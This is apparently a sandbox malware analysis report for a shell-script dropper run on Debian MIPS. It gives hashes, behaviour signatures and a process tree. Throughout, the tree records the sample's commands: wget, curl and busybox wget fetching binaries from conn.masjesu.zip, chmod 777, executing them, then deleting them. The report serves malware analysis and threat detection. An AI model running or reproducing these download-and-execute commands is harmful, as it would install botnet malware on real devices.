Analysis
-
max time kernel
102s -
max time network
100s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
-
Size
10KB
-
MD5
85d74baef7ce93fd942b1abca31bf2dd
-
SHA1
a7e677437c07ce76e9242021261bc10ae3c1728e
-
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
-
SHA512
01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677
-
SSDEEP
192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:746
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:760
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:805
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:808
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:809
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:826
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:849
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:873
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:880
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:924
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:936
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:943
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:971
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:973
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
